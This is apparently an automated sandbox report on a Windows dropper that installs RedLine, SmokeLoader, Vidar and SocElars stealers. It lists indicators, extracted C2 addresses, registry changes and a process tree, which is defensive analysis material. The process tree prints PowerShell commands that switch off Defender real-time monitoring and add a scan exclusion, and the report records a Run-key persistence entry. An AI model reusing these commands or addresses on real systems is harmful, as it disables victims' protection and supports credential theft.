Resubmissions
28/10/2021, 15:53
211028-tbqhfabhb2 1028/10/2021, 05:27
211028-f5paksheak 1027/10/2021, 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
382s -
max time network
1809s -
submitted
01/01/1970, 00:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_installer.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_installer.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_installer.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_installer.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win10-de-20210920
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
media26
91.121.67.60:23325
Extracted
redline
chris
194.104.136.5:46013
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral1/memory/2396-222-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2396-223-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2396-224-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2396-225-0x0000000000418D26-mapping.dmp family_redline behavioral1/memory/2396-229-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2480-233-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2480-234-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2480-237-0x0000000000418D32-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral1/files/0x00050000000130ab-109.dat family_socelars -
resource yara_rule behavioral1/memory/908-344-0x0000000003240000-0x0000000005A55000-memory.dmp redline -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/908-345-0x0000000000400000-0x0000000002C15000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00060000000125d3-62.dat aspack_v212_v242 behavioral1/files/0x00060000000125c1-65.dat aspack_v212_v242 behavioral1/files/0x00060000000125c1-64.dat aspack_v212_v242 behavioral1/files/0x00060000000125d3-63.dat aspack_v212_v242 behavioral1/files/0x0005000000012616-69.dat aspack_v212_v242 behavioral1/files/0x0005000000012616-68.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 53 IoCs
pid Process 848 setup_install.exe 1752 Wed096a1bff61.exe 1784 Wed09b3a5ca1a712d390.exe 920 Wed09d8d6edfaff2ac.exe 1888 Wed0901eb1dae126e32.exe 1216 Wed09cfb2f9758281d8.exe 736 Wed0971f17486f8.exe 1116 Wed09d27135e5a8b3b.exe 1748 Wed09e95ff6b5.exe 588 Wed094c47c32b.exe 608 Wed09abf83d9c2.exe 368 Wed09d27135e5a8b3b.tmp 1008 Wed09b2a8bc4f16cb.exe 2104 Wed09d27135e5a8b3b.exe 2092 Wed09abf83d9c2.exe 2404 Wed0901eb1dae126e32.exe 2396 Wed0971f17486f8.exe 2480 Wed0901eb1dae126e32.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 3036 Wed09977fdc12334.exe 1704 run2.exe 1032 run.exe 816 XYB0bVL96aEKhA.exE 2544 ZuvYxb7vH8W1fyEV5Q720iS5.exe 2748 1937834.exe 2440 445856.exe 2436 7651461.exe 2596 2141197.exe 2328 Wed09f257bb7877d00b2.exe 3056 LzmwAqmV.exe 836 BCleanSoft82.exe 240 wangting-game.exe 908 Soft1WW02.exe 1212 4.exe 2716 5.exe 1000 search_hyperfs_206.exe 2872 kPBhgOaGQk.exe 2824 setup.exe 240 wangting-game.exe 3324 Calculator Installation.exe 3348 10.exe 3480 Chrome5.exe 3604 3974731.exe 3844 7957989.exe 3920 LzmwAqmV.exe 2420 8961721.exe 2284 7588482.exe 1536 1573578.exe 1856 2455260.exe 1960 5934997.exe 900 WinHoster.exe 3404 services64.exe 3712 sihost64.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Wed09d8d6edfaff2ac.exe Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Wed09977fdc12334.exe -
Loads dropped DLL 64 IoCs
pid Process 816 setup_installer.exe 816 setup_installer.exe 816 setup_installer.exe 848 setup_install.exe 848 setup_install.exe 848 setup_install.exe 848 setup_install.exe 848 setup_install.exe 848 setup_install.exe 848 setup_install.exe 848 setup_install.exe 1960 cmd.exe 1000 cmd.exe 1784 Wed09b3a5ca1a712d390.exe 1784 Wed09b3a5ca1a712d390.exe 1964 cmd.exe 1304 cmd.exe 1304 cmd.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 1980 cmd.exe 1980 cmd.exe 1788 cmd.exe 1788 cmd.exe 1888 Wed0901eb1dae126e32.exe 1888 Wed0901eb1dae126e32.exe 1144 cmd.exe 1196 cmd.exe 1744 cmd.exe 736 Wed0971f17486f8.exe 736 Wed0971f17486f8.exe 1116 Wed09d27135e5a8b3b.exe 1116 Wed09d27135e5a8b3b.exe 1216 Wed09cfb2f9758281d8.exe 1216 Wed09cfb2f9758281d8.exe 588 Wed094c47c32b.exe 588 Wed094c47c32b.exe 1116 Wed09d27135e5a8b3b.exe 956 cmd.exe 1928 cmd.exe 1928 cmd.exe 608 Wed09abf83d9c2.exe 608 Wed09abf83d9c2.exe 1008 Wed09b2a8bc4f16cb.exe 1008 Wed09b2a8bc4f16cb.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 608 Wed09abf83d9c2.exe 368 Wed09d27135e5a8b3b.tmp 2104 Wed09d27135e5a8b3b.exe 2104 Wed09d27135e5a8b3b.exe 2092 Wed09abf83d9c2.exe 2092 Wed09abf83d9c2.exe 736 Wed0971f17486f8.exe 1888 Process not Found 1888 Process not Found 2396 Wed0971f17486f8.exe 2396 Wed0971f17486f8.exe 2480 Wed0901eb1dae126e32.exe 2480 Wed0901eb1dae126e32.exe 920 Wed09d8d6edfaff2ac.exe 1636 cmd.exe 3036 Wed09977fdc12334.exe 3036 Wed09977fdc12334.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2455260.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 ipinfo.io 43 ipinfo.io 73 ip-api.com 25 ipinfo.io -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 736 set thread context of 2396 736 Wed0971f17486f8.exe 67 PID 1888 set thread context of 2480 1888 Process not Found 69 PID 2192 set thread context of 3984 2192 conhost.exe 152 -
autoit_exe 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000130d5-129.dat autoit_exe behavioral1/files/0x00050000000130d5-168.dat autoit_exe behavioral1/files/0x00050000000130d5-177.dat autoit_exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2976 920 WerFault.exe 45 2280 3036 WerFault.exe 76 3804 908 WerFault.exe 105 1588 2716 WerFault.exe 107 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2592 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2848 taskkill.exe 1276 taskkill.exe 1856 taskkill.exe 3340 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ja-JP = "ja-JP.1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000a182df0cea11f81997b23ec8afc1ebf0938fa728420a809eb5b0c59adeb97e77000000000e800000000200002000000027b329faf56b1d5150ebeebb44835d347bcb5fb2c0f18463aad696e49ce640d120000000a3ce987abc7e284d8663892e7af7af211c552a87d12232e5d89efeeacb2adc8040000000e4b0eac070acce038468ecf512e3c5698466403e14e717a7286c340733f309c4f329f36c93116a807436218abb2e2376089a5d8ef7db780d5ae1ac2a7cf9624d iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a6000000000200000000001066000000010000200000005ad1bb363575eb9f8b7ff694957bb13f220e7c140ac27714c6777476e61d5cff000000000e8000000002000020000000f146d94caaa18a34913569f9011dd86e8f02615a563cd83370ff627be3e708d990000000d1dc0bc7928f06005172a1a64f515e53e66b570a4678564d047c6d1b93539f172ac6fb8e46f209741e5cf787d0947eb96f82df374549ef04cf13c097028fa612a3fd8c613d42f829b387ba0077ecf077d7e36eb3a50c43033f6c1d173da7777b37055c9b9f98736249282d8e48b848237fc9b29972fdab250c09aaaefc0f88a5a3b3815c355cc759f6ce64b1bc3aee80400000009f6d2462a5fa20f544f01ebf57094db1748c1cbf2da36ddae826403906cbd3040871c6afd5316d60d48167c375a1d583d4053279192e24ade54c22e942ea4452 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{12DC56A0-3733-11EC-BA8C-DA23DD5773EE} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "342110311" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4029a80940cbd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1284 powershell.exe 1072 powershell.exe 1008 Wed09b2a8bc4f16cb.exe 1008 Wed09b2a8bc4f16cb.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 920 Wed09d8d6edfaff2ac.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe 1392 Process not Found 2760 uTYF4Szi1W3vSP2gbPT0wzv0.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 1392 Process not Found 2976 WerFault.exe 2280 WerFault.exe 3804 WerFault.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1008 Wed09b2a8bc4f16cb.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 1784 Wed09b3a5ca1a712d390.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 2848 taskkill.exe Token: SeDebugPrivilege 1276 taskkill.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 2280 WerFault.exe Token: SeDebugPrivilege 2976 WerFault.exe Token: SeDebugPrivilege 1752 Wed096a1bff61.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 2748 1937834.exe Token: SeDebugPrivilege 2440 445856.exe Token: SeDebugPrivilege 2396 Wed0971f17486f8.exe Token: SeDebugPrivilege 2716 5.exe Token: SeDebugPrivilege 1212 4.exe Token: SeDebugPrivilege 836 BCleanSoft82.exe Token: SeDebugPrivilege 1856 2455260.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 2480 Wed0901eb1dae126e32.exe Token: SeDebugPrivilege 3348 10.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 3804 WerFault.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 3836 conhost.exe Token: SeDebugPrivilege 3604 3974731.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 3844 7957989.exe Token: SeDebugPrivilege 1588 WerFault.exe Token: SeDebugPrivilege 3340 taskkill.exe Token: SeDebugPrivilege 2420 8961721.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 1960 5934997.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 2192 conhost.exe Token: SeLockMemoryPrivilege 3984 explorer.exe Token: SeLockMemoryPrivilege 3984 explorer.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1392 Process not Found 1392 Process not Found 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1392 Process not Found 1392 Process not Found 1704 run2.exe 1392 Process not Found 1392 Process not Found 1704 run2.exe 1704 run2.exe 1392 Process not Found 1392 Process not Found 828 iexplore.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1392 Process not Found 1392 Process not Found 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1748 Wed09e95ff6b5.exe 1704 run2.exe 1704 run2.exe 1704 run2.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 828 iexplore.exe 828 iexplore.exe 2492 IEXPLORE.EXE 2492 IEXPLORE.EXE 2492 IEXPLORE.EXE 2492 IEXPLORE.EXE 2492 IEXPLORE.EXE 2492 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 816 wrote to memory of 848 816 setup_installer.exe 29 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 560 848 setup_install.exe 31 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1100 848 setup_install.exe 32 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1720 848 setup_install.exe 33 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1000 848 setup_install.exe 34 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1964 848 setup_install.exe 36 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1960 848 setup_install.exe 35 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1788 848 setup_install.exe 37 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1372 848 setup_install.exe 38 PID 848 wrote to memory of 1304 848 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS033BA646\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵PID:560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵PID:1100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe3⤵PID:1720
-
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe4⤵
- Executes dropped EXE
PID:2328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe3⤵
- Loads dropped DLL
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Users\Admin\AppData\Roaming\1937834.exe"C:\Users\Admin\AppData\Roaming\1937834.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Users\Admin\AppData\Roaming\445856.exe"C:\Users\Admin\AppData\Roaming\445856.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
